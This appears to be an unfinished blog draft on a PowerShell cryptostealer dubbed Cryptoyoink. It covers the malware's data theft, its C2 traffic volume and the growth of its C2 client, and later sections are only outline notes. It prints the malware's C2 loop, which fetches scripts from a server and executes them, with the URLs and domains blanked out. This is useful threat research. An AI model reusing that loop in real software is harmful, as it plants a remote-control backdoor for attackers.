Recently, I’ve been tracking the evolution of a piece of malware that I’ve started to call Cryptoyoink (kudos to @alicynx for the name!), a multi-stage cryptostealer written in PowerShell. Cryptoyoink isn’t particularly innovative, but it takes advantage of common blind spots in traditional antimalware, and the author(s) behind it have been refining their operations over at least the past four months.

Xavier Mertens first posted a deep-dive on this cryptostealer on the SANS ISC blog on June 22nd, and at the time VirusTotal showed that only 1 out of 53 vendors flagged it as malicious.

What Xavier didn’t cover in depth is how Cryptoyoink’s C2 works, which piqued my interest after I noticed that Cryptoyoink’s current C2 domains rank in the top 100k most popular domains according to Cloudflare Radar, and around the top 200k most popular domains according to Cisco Umbrella. In total, Cryptoyoink’s C2 accounts for over 500 million DNS requests per week.

So, what does Cryptoyoink do? How has Cryptoyoink’s C2 changed over time? Is this a massive threat that’s been underreported, or what’s going on to cause so much traffic?

Perhaps most importantly, can I ruin Cryptoyoink’s operator’s day?

Payload: Cryptoyoink’s Cryptostealer

As mentioned prior, I’m not the first person to discover the cryptostealer I’m calling Cryptoyoink. The first mention of this malware that I can find was on malware removal forums starting in mid-May 2022, such as this thread reporting a risky connection to

The first deep dive into this Cryptoyoink was published by Xavier Mertens on the SANS ISC blog on June 22nd. This first publicly-known version had a very low score on VirusTotal at the time (1/53) and does the following:

  • Collects details about the infected computer, such as user information and antivirus status.
  • Searches for cryptocurrency extensions (ex. wallets) in Chrome, Brave, and Edge browsers.
  • Reports user data and relevant extensions to over HTTP.
  • Runs any commands given in’s response, presumably this would be commands to steal sensitive information.

This sample also included another PowerShell script - commented out - that would monitor the clipboard for wallet addresses.

first deeper dive by xme at SANS ISC


jul 5:

sept 26:

Cryptoyoink’s C2 Client

Original C2 Client (May/June)

first user report I can find

user reports in June: no DGA, simple invocation, script hidden in drivers (noisy)

while ($true) {
  try {
    $r = Invoke-RestMethod -Uri ''
    if ($r -ne '') {
      Start-Job ([ScriptBlock]::Create($r)) | Wait-Job
  catch {}
  Start-Sleep 2

automated analysis around may 23 in hybrid-analysis

C2 Client Adds a DGA

user reports in July: new DGA

C2 Client Goes Fileless

here’s how the new version gets installed (registry, xor, run) how the new C2 DGA works

oh btw the operator didn’t register nine of its C2 domains so I did tune in next time …

Ruining the Day

and this is why your DGA needs to be better kids